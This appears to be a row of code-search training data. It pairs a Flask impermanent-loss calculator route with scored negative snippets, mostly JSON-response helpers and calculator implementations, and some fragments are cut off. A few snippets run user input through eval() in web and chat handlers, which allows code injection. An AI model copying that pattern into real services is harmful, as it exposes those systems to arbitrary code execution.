BaseModel, out_description: str) -> Callable:\n for model, name in ((in_model, 'Input'), (out_model, 'Output')):\n doc.Object(\n make_dataclass(\n f'Api{api[1:].title()}{name}',\n [(key, val.type_, val.type_)\n for key, val in model.__dict__['__fields__'].items()]))\n im_returns = doc.JsonBody({\n key: val.type_\n for key, val in in_model.__dict__['__fields__'].items()\n })\n\n om_returns = {\n key: val.type_\n for key, val in out_model.__dict__['__fields__'].items()\n }\n\n def decorator(func):\n @doc.summary(summary)\n @doc.response(412,\n 'Error: Precondition Failed',\n description='The passed request-parameters are invalid')\n @doc.response(500,\n 'Error: Server-Error occured',\n description='An internal error occured')\n @doc.consumes(im_returns,\n content_type='application/json',\n location='body')\n @doc.produces(om_returns,\n content_type='application/json',\n description=out_description)\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n return await func(request=request, *args, **kwargs)\n\n return function_wrapper\n\n return decorator", "def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)", "def json_response(self, request, *args, **kwargs):\n\n return HttpResponse(self.construct_json(),\n content_type='application/json',\n mimetype='application/json', status=self.status)", "def get_json(response):\n\n json_field_or_function = getattr(response, 'json', None)\n if callable(json_field_or_function):\n return response.json()\n else:\n return json.loads(response.content)", "def convert_to_json(data, name, is_model=False):\n if is_model:\n data = json.dumps(data, indent=4, cls=ModelListEncoder)\n else:\n data = list({item for sublist in data for item in sublist})\n data = list(filter(None, data))\n data = json.dumps(data, indent=4)\n\n with open(PATH + name, 'w', encoding=\"utf-8\") as file:\n file.write(data)", "def default(self, obj):\n\n if hasattr(obj, 'to_dict'):\n return getattr(obj, 'to_dict')()\n\n 
if isinstance(obj, query.Query):\n return list(obj)\n\n elif isinstance(obj, datetime.datetime):\n return obj.isoformat()\n\n elif isinstance(obj, time.struct_time):\n return list(obj)\n\n elif isinstance(obj, users.User):\n output = {}\n methods = ['nickname', 'email', 'auth_domain']\n for method in methods:\n output[method] = getattr(obj, method)()\n return output\n\n elif isinstance(obj, model.Key):\n return obj.get()\n\n return simplejson.JSONEncoder.default(self, obj)", "def default(self, o):\n if (ClientData.__name__ == o.__class__.__name__):\n return o.to_dict()\n else:\n return json.JSONEncoder.default(self, o)", "def render_json(self, obj):\n self.response.content_type = \"application/json\"\n self.response.out.write(json.encode(obj))", "def to_response_data(self) -> typing.Any:\n return json.dumps(self.value, cls=ToJsonEncoder)", "def mocked_json(return_data=None):\n if return_data is None:\n return_data = {}\n\n def json(*args, **kwargs): # pylint:disable=unused-argument, missing-docstring\n return return_data\n return json", "def opt_engine_rest_api():\n request_json = request.get_json()\n return process_request(request_json)", "def xjsonify(obj):\n\n return Response(json.dumps(obj), mimetype='application/json')", "def json_serialize(self):\n raise NotImplementedError('json_serialize must be overriden')", "def __call__(self, rv):\n if isinstance(rv, ResponseBase):\n return rv\n data, status, headers = unpack(rv)\n resp = flask.make_response(self._encoder(data, **self.json_settings),\n status, {'Content-Type': self.content_type})\n resp.headers.extend(headers)\n return resp", "def get():\n #Return the corresponding value\n return json_back()", "def requests_response_to_model(response_transformer):\n def response_transform_decorator(original_func):\n \"\"\"\n Creates wrapper around a function that returns response\n \"\"\"\n def response_transformer_wrapper(*args, **kwargs):\n \"\"\"\n Log errors and apply transformation in response_handler_func\n \"\"\"\n try:\n response = original_func(*args, **kwargs)\n response.raise_for_status()\n\n except requests.exceptions.HTTPError:\n help_string = ('Please consult the Coursera Data '\n 'Exports Guide for further assistance: '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n if (response.status_code == 403):\n help_string = ('Please authorize this application '\n 'by running:\\n'\n '\\t$ courseraoauth2client config authorize --app manage_research_exports\\n' # noqa\n 'See https://github.com/coursera/courseraoauth2client ' # noqa\n 'for more information on authorization.\\n'\n 'For further assistance, consult the '\n 'Coursera Data Exports Guide '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n logging.error(\n 'Request to {url} with body:\\n\\t{body}\\nreceived response'\n ':\\n\\t{text}\\n'\n '{help_string}\\n'\n .format(url=response.url,\n text=response.text,\n body=(response.request and response.request.body),\n help_string=help_string))\n raise\n\n return response_transformer(response)\n return response_transformer_wrapper\n return response_transform_decorator", "def normalize_response(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n return {\"code\": 0, \"msg\": \"\", \"data\": ret_val}\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20002, \"msg\": str(err)}\n return result\n return wrapper", "def _trait_to_json(x, self):\n return x", "def 
get_response_model_ctor(self):\n return self._response_model_ctor" ]
[ "0.6303589", "0.6233411", "0.6158551", "0.61566204", "0.61502767", "0.6142237", "0.6134618", "0.60121006", "0.60005003", "0.5990344", "0.59364825", "0.59224707", "0.59192204", "0.5905445", "0.58905154", "0.58634555", "0.5848181", "0.5831524", "0.58291614", "0.58150035", "0.5784024", "0.57303464", "0.5703129", "0.5703129", "0.5699096", "0.5698261", "0.566989", "0.56070447", "0.55946916", "0.5593708", "0.5575277", "0.55716133", "0.5556596", "0.5547955", "0.554137", "0.5535954", "0.548352", "0.54771614", "0.5475626", "0.54659075", "0.5451081", "0.5448285", "0.54318607", "0.54299855", "0.5423321", "0.542127", "0.5406202", "0.5403265", "0.53871393", "0.53737146", "0.5346496", "0.53372973", "0.5319322", "0.52877176", "0.5280581", "0.5269348", "0.52587616", "0.5242363", "0.52414584", "0.5237407", "0.52359766", "0.5231135", "0.5230241", "0.5220532", "0.5212685", "0.5212264", "0.5207956", "0.5196498", "0.5196498", "0.5196498", "0.5196498", "0.5196498", "0.5192555", "0.51799154", "0.5174056", "0.51602787", "0.5158697", "0.5140324", "0.5134635", "0.5129241", "0.5128415", "0.5123251", "0.5117758", "0.511543", "0.51142126", "0.51108295", "0.5108938", "0.5107516", "0.51025313", "0.50885165", "0.5081132", "0.5077513", "0.5077225", "0.5066023", "0.5057553", "0.5056245", "0.5052294", "0.50469357", "0.50423723", "0.50375116" ]
0.6607163
0
Route to send calculator input
def operation_result(): input1 = request.form['Input1'] input2 = request.form['Input2'] input3 = request.form['Input3'] input4 = request.form['Input4'] input5 = request.form['Input5'] input6 = request.form['Input6'] try: token_price_a_initial = float(input1) token_price_b_initial = float(input2) token_price_a_future = float(input3) token_price_b_future = float(input4) token_a_pool_weight = float(input5) token_b_pool_weight = float(input6) if token_a_pool_weight + token_b_pool_weight == 1: r1 = token_price_a_future/token_price_a_initial r2 = token_price_b_future/token_price_b_initial impermanent_loss = ((r1**(token_a_pool_weight))*(r2**(token_b_pool_weight)) /(r1*token_a_pool_weight + r2*token_b_pool_weight) - 1)*-100 return render_template( 'calculator.html', result=impermanent_loss, calculation_success=True ) except: return render_template( 'calculator.html', calculation_success=False )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculator(operation): \n \n operation = MATH[operation]\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n total = operation(a, b)\n\n return f\"<h1>TOTAL: {total}</h1>\"", "def all_arithmetic_operators(request: Any) -> Any:\n return request.param", "def all_arithmetic_operators(request: Any) -> Any:\n return request.param", "def all_arithmetic_operators(request):\n return request.param", "def create_calculation():\n if request.method == 'POST':\n ip = request.remote_addr\n text = request.form['answer']\n user = find_user(ip)\n is_valid, message = check_valid_expression(text)\n if is_valid:\n answer = eval(text)\n db.create(user, str(message + \"=\" + str(answer)))\n return redirect('/')\n return redirect(url_for('.handle_error', message=message))\n\n return render_template('create_calculation.html', calculation=None)", "def index():\n\n page = \"\"\"\n <h1>Calculator</h1>\n <div>Directions. This app will calculate 2 or more numbers provided in the url string. To use:\n <ol>\n <li>Type in http://localhost:8080/</li>\n <li>Type in the arithmetic operation (add, subract, multiply, divide) followed by /</li>\n <li>Type in numbers. Between each number include a /</li>\n <li>For example, http://localhost:8080/add/5/10/</li>\n </ol></div>\n <h2>Tests:</h2><ul>\n <li><a href=\"http://localhost:8080/add/5/10/15\">Addition</a></li>\n <li><a href=\"http://localhost:8080/subtract/100/50/25\">Subraction</a></li>\n <li><a href=\"http://localhost:8080/multiply/5/10/15\">Multiplication</a></li>\n <li><a href=\"http://localhost:8080/divide/100/50\">Division</a></li>\n \"\"\"\n return page", "def cmd_calc(self, event, command, usercommand):\n try:\n result = str(self.parser.eval(usercommand.arguments))\n response = '*** Calc: {}'.format(escape(result))\n except:\n fail = '*** Could not evaluate expression.'\n\n if self.wolfram:\n try:\n res = self.wolfram.query(usercommand.arguments)\n if len(res.pods) > 1:\n answer = res.pods[1].text\n\n # fix unicode\n answer = answer.encode('unicode-escape')\n answer = answer.replace(b'\\\\\\\\:', b'\\u')\n answer = answer.decode('unicode-escape')\n\n response = '*** W|A: {}'.format(escape(answer))\n else:\n response = fail\n except Exception as ex:\n if 'Computation error' in str(ex):\n response = fail\n else:\n print('exception:', ex)\n response = '*** Sorry, we ran into a problem. 
Please try again later'\n else:\n response = fail\n\n event['from_to'].msg(response)", "def math(oper):\n a=int(request.args.get('a'))\n b=int(request.args.get('b'))\n result = math_oper[oper](a,b)\n return str(result)", "def cmd_calculation():", "def home(*args):\n home_page = \"\"\"To use this calculator, simply type the desired mathematic operation<br>\n after the http://localhost:8080/ in your browser's address bar.<br>\n Your choices are:<br>\n add/<br>\n subtract/<br>\n multiply/<br>\n divide/<br>\n Follow your mathematic operation in the address with as many operands as you want.<br>\n <br>\n Example: http://localhost:8080/add/5/3/2/6/10 will return a value of 26 to your browser.<br>\"\"\"\n\n return home_page", "def main():\n model = Calculator()", "def calculator(): \n\n #asks for user's input \n user_input = raw_input(\"Type in the math expression and two numbers like + 1 2 : \")\n #splits the user's input into a list\n math_op = user_input.split(\" \")\n\n #pulls the appropriate function based on the user's input\n if math_op[0] == '+':\n print add(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '-':\n print subtract(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '*':\n print multiply(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == '/':\n print divide(int(math_op[1]), int(math_op[2]))\n \n elif math_op[0] == \"square\":\n print square(int(math_op[1]))\n\n elif math_op[0] == 'cube':\n print cube(int(math_op[1]))\n\n elif math_op[0] == 'pow':\n print power(int(math_op[1]), int(math_op[2]))\n\n elif math_op[0] == 'mod':\n print mod(int(math_op[1]), int(math_op[2]))\n\n else:\n print \"That is not a valid input. Please try any of the following operator: + - * / square cube pow mod.\"", "def Calc():\n print('Please type a maths expression with 2 intergers or floats and an operator \"+\", \"-\", \"*\" or \"/\"')\n inp = (input())\n for char in inp:\n if char not in '1234567890.-+*/':\n print('Please restart the program and only type valid characters')\n return\n operators = [\"+\", \"-\", \"*\", \"/\"]\n buf = ''\n operand1 = 0.0\n operand2 = 0.0\n for char in inp:\n if char not in operators:\n buf += char\n else:\n operator = char\n operand1 = float(buf)\n buf = ''\n operand2 = float(buf)\n res = 0.0\n if operator == '+':\n res = su(operand1, operand2)\n elif operator == '-':\n res = sub(operand1, operand2)\n elif operator == '*':\n res = mu(operand1, operand2)\n elif operand2==0:\n return \"Can not divide by 0\"\n else:\n res = di(operand1, operand2)\n print(res)\n return res", "def main():\n pycalcApp = QApplication(sys.argv)\n pycalcView = PyCalcUi()\n pycalcView.show()\n model = evaluateExpression\n PyCalcController(model=model, view=pycalcView)\n sys.exit(pycalcApp.exec())", "def get(self):\n ops = self.request.get('ops')\n logging.info('get: ' + ops)\n if ops:\n self.request.body = ops\n self.post()\n self.response.headers['Content-Type'] = 'text/html'", "def test_simple_calculation(self):\n\t\turl = reverse('calculation')\n\t\tdata = {'expression': '2+3*(4+2)'}\n\t\tresponse = self.client.post(url, data, format='json')\n\t\tself.assertEqual(response.status_code, status.HTTP_200_OK)\n\t\tself.assertEqual(response.data, {'result': 20 })", "def all_math(operator):\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n return str(functions[operator](a,b))", "def _present_user_calculator_options_interface(self):\n print(\"\\nwelcome to the calculator\")\n print(\"What would you like to do\")\n print(\"Choose a number:\")\n 
print(\"1)Solve an equation\")\n print(\"2)Exit\")", "def dispatch_request(self):\n\n text = request.args.get('text')\n model_name = request.args.get('model')\n\n if 'text' in request.form:\n text = request.form['text']\n if 'model' in request.form:\n model_name = request.form['model']\n\n if text is None:\n message = \"The service accepts GET and POST requests containing a mandatory 'text' parameter\"\n raise InvalidAPIUsage(message, status_code=400)\n\n models = app.config['MODELS']\n\n if model_name is None:\n model_name = app.config['DEFAULT_MODEL']\n\n if model_name not in models:\n message = 'Unknown model: %s' % model_name\n raise InvalidAPIUsage(message, status_code=400)\n\n # Compute answer\n answer = None\n\n return jsonify(answer)", "async def _calc(self, ctx, *, m):\r\n m = \"\".join(m)\r\n math_filter = re.findall(\r\n r\"[\\[\\]\\-()*+/0-9=.,% ]|>|<|==|>=|<=|\\||&|~|!=|^|sum\"\r\n + \"|range|random|randint|choice|randrange|True|False|if|and|or|else\"\r\n + \"|is|not|for|in|acos|acosh|asin|asinh|atan|atan2|atanh|ceil\"\r\n + \"|copysign|cos|cosh|degrees|e|erf|erfc|exp|expm1|fabs|factorial\"\r\n + \"|floor|fmod|frexp|fsum|gamma|gcd|hypot|inf|isclose|isfinite\"\r\n + \"|isinf|isnan|ldexp|lgamma|log|log10|log1p|log2|modf|nan|pi\"\r\n + \"|pow|radians|sin|sinh|sqrt|tan|tanh|round\",\r\n m,\r\n )\r\n calculate_stuff = eval(\"\".join(math_filter))\r\n if len(str(calculate_stuff)) > 0:\r\n em = await Embed.create(\r\n ctx,\r\n title=\"CollectorDevTeam Calculator\",\r\n thumbnail=self.thumbnail,\r\n description=\"**Input**\\n`{}`\\n\\n**Result**\\n`{}`\".format(m, calculate_stuff),\r\n )\r\n em.add_field(name=\"Type Math\", value=\"Get Fun\")\r\n await ctx.send(embed=em)", "def add(*args):\r\n\r\n # TODO: Fill sum with the correct value, based on the\r\n # args provided.\r\n num_a = int(args[0])\r\n num_b = int(args[1])\r\n answer = \"\"\"<html>\r\n <head>\r\n <title>WSGI Calculator</title>\r\n </head>\r\n <body>\r\n The answer is: {}\r\n </body>\r\n </html>\"\"\"\r\n\r\n try:\r\n total = num_a + num_b\r\n except:\r\n raise ValueError\r\n return answer.format(total)\r\n #body = \"Your total is: {}\".format(total)\r\n #print(\"Content-type: text/plain\")\r\n #print()\r\n #print(body)\r", "def on_select(self):\n print(\"Please enter a question in one of the following formats:\")\n print(\" 1- op1 operator op2\")\n print(\" 2- operator op\")\n print(\"Where operator can be: +,-,*,/,^,V\")\n print(\" ^ denotes power and V denotes square root\")\n question = input(\"Question: \")\n self.solve(question)", "def index(request):\n form = ConverterForm()\n\n template = loader.get_template(\"number_converter_app/index.html\")\n context = {\"form\": form}\n return HttpResponse(template.render(context, request))", "def instructions():\n\n instructions_text = 'Here is how to use this calculator:<br>'\n instructions_text += 'http://localhost:8080/ => These instructions<br>'\n instructions_text += 'To add: http://localhost:8080/add/23/42 => 65<br>'\n instructions_text += 'To subtract: http://localhost:8080/subtract/23/42 => -19<br>'\n instructions_text += 'To multiply: http://localhost:8080/multiply/3/5 => 15<br>'\n instructions_text += 'To divide: http://localhost:8080/divide/22/11 => 2'\n\n return instructions_text", "def calc():\r\n\r\n op = input(\"Valitse operaatio (+, -, *, /): \")\r\n if op in ('+', '-', '*', '/'):\r\n try:\r\n luku1 = float(input(\"Anna luku 1: \"))\r\n luku2 = float(input(\"Anna luku 2: \"))\r\n except ValueError:\r\n print(\"Ei tämä ole mikään luku\")\r\n\r\n else:\r\n if 
op == '+':\r\n vastaus = luku1 + luku2\r\n elif op == '-':\r\n vastaus = luku1 - luku2\r\n elif op == '*':\r\n vastaus = luku1 * luku2\r\n elif op == '/':\r\n if luku2 != 0:\r\n vastaus = luku1 / luku2\r\n else:\r\n print(\"Tällä ohjelmalla ei pääse äärettömyyteen\")\r\n return\r\n print(\"Tulos: {}\".format(vastaus))\r\n else:\r\n print(\"operaatiota ei ole olemassa\")", "def equation(operation, firstnum, secondnum):\n if operation == 'plus':\n return firstnum + secondnum\n elif operation == 'minus':\n return firstnum - secondnum\n elif operation == 'multiply':\n return firstnum * secondnum\n elif operation == 'divide':\n if not secondnum == 0:\n return firstnum / secondnum\n raise ZeroDivisionError(\"Unable to divide by 0.\")\n raise ValueError('Invalid operation provided.')", "def perform_operation(operator, num_1, num_2):\n\n if operator == \"*\":\n return num_1 * num_2\n if operator == \"+\":\n return num_1 + num_2\n if operator == \"-\":\n return num_1 - num_2\n if operator == \"/\":\n return num_1 / num_2", "def main():\n print(\"Choose your desired operator:\")\n print(\"1 to calculate hypotenuse \\n\"\n \"2 to add \\n\"\n \"3 to subtract \\n\"\n \"4 to multiply \\n\"\n \"5 to divide\")\n\n user_input = input(\"your choice: \")\n\n # check if input is an int from 1 to 5.\n while not user_input.isnumeric() or int(user_input) > 5 or int(user_input) < 1:\n print(\"\\ninvalid choice\")\n user_input = input(\"your choice: \")\n choice = int(user_input)\n\n a = float(input(\"enter first number: \"))\n b = float(input(\"enter second number: \"))\n\n # switch case using dictionary\n switcher = {\n 1: hypotenuse.calculate_hypotenuse(a, b),\n 2: sum(a, b),\n 3: subtract(a, b),\n 4: multiply(a, b),\n 5: divide(a, b)\n }\n answer = switcher.get(choice, \"invalid\")\n print(\"answer: {0}\".format(round(answer, 2)))", "def basic_calculator():\r\n\r\n num1 = input(\"Enter first number: \") # taking input\r\n\r\n # handling the exception of typecasting the value of 'num1' to float\r\n try:\r\n num1 = float(num1)\r\n except ValueError:\r\n print(\"Error: Input numeric values.\\nTry Again!\")\r\n exit()\r\n\r\n num2 = input(\"Enter second number: \") # taking input\r\n\r\n # handling the exception of typecasting the value of 'num2' to float\r\n try:\r\n num2 = float(num2)\r\n except ValueError:\r\n print(\"Error: Input numeric values.\\nTry Again!\")\r\n exit()\r\n\r\n # Asking user for the operation\r\n print(\"Select the operation:\")\r\n print(\"Type:\")\r\n print(\"1 for Addition\\n2 for Subtraction\\n3 for Multiplication\\n4 for Division\\n5 for Integer Division\\n6 for Power\")\r\n choice = input(\"Enter your choice: \")\r\n\r\n result = 0.0\r\n\r\n # Performing the operation and providing the result\r\n if choice == '1':\r\n result = num1 + num2\r\n elif choice == '2':\r\n result = num1 - num2\r\n elif choice == '3':\r\n result = num1 * num2\r\n elif choice == '4':\r\n result = num1 / num2\r\n elif choice == '5':\r\n result = num1 // num2\r\n elif choice == '6':\r\n result = num1 ** num2\r\n else:\r\n print(\"Wrong Input! 
Try Again.\")\r\n exit()\r\n\r\n print(f'\\nThe result is: {result}')", "def result(request):\n form = ConverterForm()\n\n template = loader.get_template(\"number_converter_app/result.html\")\n given_number = request.POST.get(\"given_number\")\n\n MyNumber = Number(given_number)\n\n context = {\n \"form\": form,\n \"given_number\": given_number,\n \"result\": MyNumber.result,\n }\n return HttpResponse(template.render(context, request))", "def perform_op(self):\n args = self.display.get_text().split(' ') \n arg1 = args[0]\n arg2 = args[2]\n op = args[1]\n result = ''\n\n if op == '+':\n result = str(int(arg1) + int(arg2))\n elif op == '-':\n result = str(int(arg1) - int(arg2))\n elif op == '*':\n result = str(int(arg1) * int(arg2))\n else:\n result = float(arg1) / float(arg2)\n result = '%.0f' % (result) if round(result) == result \\\n else '%f' % (result)\n\n self.reset(result)", "def math_add():\n a = int(request.args.get(\"a\"))\n b = int(request.args.get(\"b\"))\n return str(add(a, b))", "def route( request, c ):", "def main():\n printfunc(calc(menu()))", "def calculate(first, second, operator):\n result = \"\"\n if operator == \"+\":\n result = int(first) + int(second)\n elif operator == \"-\":\n result = int(first) - int(second)\n elif operator == \"/\":\n result = int(first) / int(second)\n elif operator == \"*\":\n result = int(first) * int(second)\n else:\n print \"Did not recognize: \" + operator\n\n return result", "def input_(self, op):\n value = input(\"Enter your input: \")\n self.set_value(op.address, value, op.type_, op.is_global)", "def hello():\n\n if request.method == 'POST':\n result: ImmutableMultiDict = request.form\n data = dict(result.lists())\n sum_up = sum_upper(data['dane'][0])\n sum_down = sum_lower(data['dane'][0])\n results = {\"Duże znaki\": sum_up, \"Małe znaki\": sum_down}\n\n return render_template(\"result.html\", result=results)", "def calculate(numbers, operator):\n \n if operator == 'add':\n return add(prepare_numbers(numbers))\n elif operator == 'subtract':\n return subtract(prepare_numbers(numbers))\n elif operator == 'multiply':\n return multiply(prepare_numbers(numbers))\n elif operator == 'divide':\n return divide(prepare_numbers(numbers))\n elif operator == 'remainder':\n return remainder(prepare_numbers(numbers))\n elif operator == 'power':\n return power(prepare_numbers(numbers))", "def main():\n #------------------------------------- Functions\n def add(text):\n \"\"\"\n This will add to the display, and be the go to function of most buttons.\n We'll want to add in conditions for what buttons go.\n \"\"\"\n orig = dispb[\"text\"]\n new = orig + text\n ops = [\"+\",\"-\",\"*\",\"/\"]\n # conditions\n # length 21\n if len(new) > 21:\n dispb[\"text\"] = orig\n return 0\n \n # one calc at a time\n if len(orig) > 0:\n if (orig[-1] in ops) & (text in ops):\n dispb[\"text\"] = orig\n return 0\n\n dispb[\"text\"] = new\n return 0\n \n def clear():\n dispb[\"text\"] = \"\"\n return 0\n \n def backspace():\n dispb[\"text\"] = dispb[\"text\"][:len(dispb[\"text\"])-1]\n return 0\n \n def equals():\n try:\n dispb[\"text\"] = str(eval(dispb[\"text\"]))\n except:\n dispb[\"text\"]=\"ERROR, clear display\"\n \n #------------------------------------- UI\n \n # title and start\n calc = tk.Tk()\n calc.title(\"Calculator\")\n # size\n calc.geometry(\"255x235\")\n #calc.columnconfigure(range(3), weight=1, minsize=50)\n #calc.rowconfigure(range(1,4), weight=1, minsize=48)\n \n # Icon\n calc.iconbitmap('Icon.ico')#'Icon.ico')\n \n \n calcarea = 
tk.Frame(master=calc)\n calcarea.pack(padx=5, pady=10)\n \n # display box\n disp = tk.Frame(\n master = calcarea\n )\n disp.grid(row = 0, column = 0, columnspan = 3)\n dispb = tk.Label(\n master = disp,\n text = '',\n fg = 'black',\n bg = 'white',\n borderwidth = 1,\n relief = 'solid',\n height = 2,\n width = 19\n )\n dispb.pack()\n \n # number buttons\n num1 = tk.Frame(\n master=calcarea\n )\n num1.grid(row = 3, column = 0)\n num1b = tk.Button(\n master = num1,\n text = 1,\n width = 5,\n height = 2,\n command = lambda: add(\"1\")\n ).pack()\n # the pack is what adds it to the UI\n # two \n num2 = tk.Frame(\n master=calcarea\n )\n num2.grid(row = 3, column = 1)\n num2b = tk.Button(\n master = num2,\n text = \"2\",\n width = 5,\n height = 2,\n command = lambda: add(\"2\")\n ).pack()\n \n # three \n num3 = tk.Frame(\n master=calcarea\n )\n num3.grid(row = 3, column = 2)\n num3b = tk.Button(\n master = num3,\n text = \"3\",\n width = 5,\n height = 2,\n command = lambda: add(\"3\")\n ).pack()\n \n # four \n num4 = tk.Frame(\n master=calcarea\n )\n num4.grid(row = 2, column = 0)\n num4b = tk.Button(\n master = num4,\n text = \"4\",\n width = 5,\n height = 2,\n command = lambda: add(\"4\")\n ).pack()\n \n # five \n num5 = tk.Frame(\n master=calcarea\n )\n num5.grid(row = 2, column = 1)\n num5b = tk.Button(\n master = num5,\n text = \"5\",\n width = 5,\n height = 2,\n command = lambda: add(\"5\")\n ).pack()\n \n # six \n num6 = tk.Frame(\n master=calcarea\n )\n num6.grid(row = 2, column = 2)\n num6b = tk.Button(\n master = num6,\n text = \"6\",\n width = 5,\n height = 2,\n command = lambda: add(\"6\")\n ).pack()\n \n # seven \n num7 = tk.Frame(\n master=calcarea\n )\n num7.grid(row = 1, column = 0)\n num7b = tk.Button(\n master = num7,\n text = \"7\",\n width = 5,\n height = 2,\n command = lambda: add(\"7\")\n ).pack()\n \n # eight \n num8 = tk.Frame(\n master=calcarea\n )\n num8.grid(row = 1, column = 1)\n num8b = tk.Button(\n master = num8,\n text = \"8\",\n width = 5,\n height = 2,\n command = lambda: add(\"8\")\n ).pack()\n \n # nine \n num9 = tk.Frame(\n master=calcarea\n )\n num9.grid(row = 1, column = 2)\n num9b = tk.Button(\n master = num9,\n text = \"9\",\n width = 5,\n height = 2,\n command = lambda: add(\"9\")\n ).pack()\n \n # zero\n num0 = tk.Frame(\n master = calcarea\n )\n num0.grid(row = 4, column = 0)\n num0b = tk.Button(\n master = num0,\n text = 0,\n width = 5,\n height = 2,\n command = lambda: add(\"0\")\n ).pack()\n \n # period\n dot = tk.Frame(\n master = calcarea\n )\n dot.grid(row = 4, column = 1)\n dotb = tk.Button(\n master = dot,\n text = \".\",\n width = 5,\n height = 2,\n command = lambda: add(\".\")\n ).pack()\n \n # equal sign\n eq = tk.Frame(\n master = calcarea\n )\n eq.grid(row = 4, column = 2, columnspan = 2)\n eqb = tk.Button(\n master = eq,\n text = \"=\",\n width = 11,\n height = 2,\n command = equals\n ).pack()\n \n # plus sign\n plus = tk.Frame(\n master = calcarea\n )\n plus.grid(row = 3, column = 4, rowspan = 2)\n plusb = tk.Button(\n master = plus,\n text = \"+\",\n width = 5,\n height = 5,\n command = lambda: add(\"+\")\n ).pack()\n \n # minus sign\n minu = tk.Frame(\n master = calcarea\n )\n minu.grid(row = 3, column = 3)\n minub = tk.Button(\n master = minu,\n text = \"-\",\n width = 5,\n height = 2,\n command = lambda: add(\"-\")\n ).pack()\n \n # multiplication\n mult = tk.Frame(\n master = calcarea\n )\n mult.grid(row = 2, column = 3)\n multb = tk.Button(\n master = mult,\n text = \"*\",\n width = 5,\n height = 2,\n command = lambda: add(\"*\")\n 
).pack()\n \n # division\n div = tk.Frame(\n master = calcarea\n )\n div.grid(row = 2, column = 4)\n divb = tk.Button(\n master = div,\n text = \"/\",\n width = 5,\n height = 2,\n command = lambda: add(\"/\")\n ).pack()\n \n # left parentheses\n lefp = tk.Frame(\n master = calcarea\n )\n lefp.grid(row = 1, column = 3)\n lefpb = tk.Button(\n master = lefp,\n text = \"(\",\n width = 5,\n height = 2,\n command = lambda: add(\"(\")\n ).pack()\n \n # right paraentheses\n rigp = tk.Frame(\n master = calcarea\n )\n rigp.grid(row = 1, column = 4)\n rigpb = tk.Button(\n master = rigp,\n text = \")\",\n width = 5,\n height = 2,\n command = lambda: add(\")\")\n ).pack()\n \n # Clear button\n Clr = tk.Frame(\n master = calcarea\n )\n Clr.grid(row = 0, column = 3)\n Clrb = tk.Button(\n master = Clr,\n text = \"C\",\n width = 5,\n height = 2,\n command = clear\n ).pack()\n \n # backspace\n bck = tk.Frame(\n master = calcarea\n )\n bck.grid(row = 0, column = 4)\n bckb = tk.Button(\n master = bck,\n text = \"\\N{RIGHTWARDS BLACK ARROW}\",\n width = 5,\n height = 2,\n command = backspace\n ).pack()\n \n # This is what kicks the whole thing off, lets it wait for commands.\n calc.mainloop()", "def execbox(response, url=\"/exec/\"):\n response.out.write(\"\"\"\n <form action=\"\" method=\"GET\">\n <b>enter command:</b><input type=\"commit\" name=\"input\" value=\"\">\n // <input type=\"button\" value=\"go\" onClick=\"makePOSTRequest(this.form)\"\n </form>\n \"\"\")", "def _send_request(self):\n route_chosen = self.comboBox_route_list.currentText()\n route_id = route_chosen.split(',')[0] #to get the id of the route\n trip_headsign_chosen = self.comboBox_trip_headsign_list.currentText()\n stop_chosen = self.comboBox_stop_list.currentText()\n self.request(route_id, trip_headsign_chosen, stop_chosen)", "def commandbox(response, url=\"/dispatch/\"):\n response.out.write(\"\"\"\n <form action=\"%s\" method=\"post\">\n <div><b>enter command:</b> <input type=\"commit\" name=\"content\"></div>\n </form>\n \"\"\" % url)", "def main():\n\texpression = input(\"Enter expression \")\n\tans = calculate(expression)\n\n\tprint(ans)", "def all_numeric_accumulations(request):\n return request.param", "def home():\r\n if request.method == \"POST\":\r\n num = request.form[\"number\"]\r\n if not str.isdigit(num) or int(num) <= 0:\r\n flash(\"Please input a positive integer.\")\r\n return redirect(request.url)\r\n return redirect(url_for(\"table\", num=num))\r\n else:\r\n return render_template(\"fetch.html\")", "def main():\n CalculatorApp().mainloop()", "def all_numeric_reductions(request):\n return request.param", "def all_numeric_reductions(request: Any) -> Any:\n return request.param", "def all_numeric_reductions(request: Any) -> Any:\n return request.param", "def corr(request):\n return request.param", "def index():\n if 'number' in request.form:\n phone_numbers.append(request.form['number'])\n return \"Cool Thanks!!!!\"\n else:\n return render_template('roulette.html', number=HOTLINE_NUMBER)", "async def request(self, multiplier: Optional[int]=None):\n # TODO: validate the multiplier\n message = Message(self.name_path, multiplier)\n await self.issue_command(Command(message))", "def operatorCommand(self, buttonText):\n def applyOperator():\n number = self.digits[\"text\"]\n if number == 'Error':\n return\n if \".\" in number:\n number = float(number)\n else:\n number = int(number)\n self.calculator.applyOperator(buttonText, number)\n self.digits[\"text\"] = str(self.calculator)\n self.operatorEntered = True\n return 
applyOperator", "def render(self, h, comp, *args):\n r = var.Var()\n\n return h.form(\n self.msg, ' ',\n h.input.action(r),\n h.input(type='submit', value='Send').action(self.answer, comp, r)\n )", "def calculator(**pars):\n # paying for parameter conversion each time to keep life simple, if not fast\n pars = revert_pars(model_info, pars)\n for k, v in pars.items():\n parts = k.split('.') # polydispersity components\n if len(parts) == 2:\n model.dispersion[parts[0]][parts[1]] = v\n else:\n model.setParam(k, v)\n return theory()", "def simple_calculator(calculation):\n\n\n operations = {'+': lambda x,y: x + y,'-': lambda x,y: x-y,'*': lambda x,y: x * y,'/': lambda x,y: x/y}\n \n def is_numeric(x):\n\n try:\n float(x)\n int(x)\n except:\n return False\n else:\n return True\n \n\n values = calculation.split()\n print(values)\n if is_numeric(values[0]) and is_numeric(values[2]) and values[1] in operations:\n operation = operations[values[1]]\n try:\n return operation(float(values[0]),float(values[2]))\n except ZeroDivisionError:\n raise ValueError(\"Division by zero\")\n\n\n raise ValueError(\"Invalid Operation\")", "def web_add():\n a = int(request.args.get('a'))\n b = 